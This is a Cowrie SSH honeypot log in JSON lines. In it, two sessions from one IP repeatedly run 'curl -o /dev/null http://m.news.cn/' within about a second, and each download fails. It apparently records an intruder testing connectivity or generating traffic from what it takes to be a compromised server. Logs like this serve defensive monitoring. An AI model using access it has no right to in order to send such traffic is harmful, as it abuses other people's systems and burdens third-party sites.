{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.189305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.190580Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.196940Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.197880Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.215110Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.216402Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.278738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.280011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.282232Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.283925Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.287609Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.288845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.338045Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.368438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.369551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.378553Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.379575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.401092Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.415492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.416795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.423447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.424273Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.455512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.456337Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.464389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.465591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.496220Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.546929Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.548728Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.549741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.561281Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.562251Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.584814Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.624818Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.645545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.646610Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.649272Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.651126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.655335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.656176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.685190Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.744368Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.752331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.753369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.757102Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.758017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.766320Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.802765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.803794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.806264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.807001Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.810152Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.838594Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.839723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.844895Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.845724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.861748Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.884781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.885981Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.889224Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.891997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.893263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.926279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.927579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.935028Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.936054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.960123Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.964823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.965881Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.973655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.974991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.998090Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.007203Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.008542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.017250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.019747Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.021005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.052405Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.087924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.089366Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.097294Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.098242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.112236Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.134922Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.136080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.137785Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.141576Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.142625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.167987Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.173656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.174503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.179287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.180041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.195903Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.208113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.209045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.221413Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.222392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.228950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.264721Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.295819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.296870Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.312419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.313437Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.384347Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.410426Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.429446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.430408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.431857Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.444513Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.445444Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.448489Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.468930Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.481405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.482432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.489135Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.491096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.491977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.519523Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.520458Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.531046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.531883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.555645Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.556739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.592323Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.608980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.610132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.612418Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.643456Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
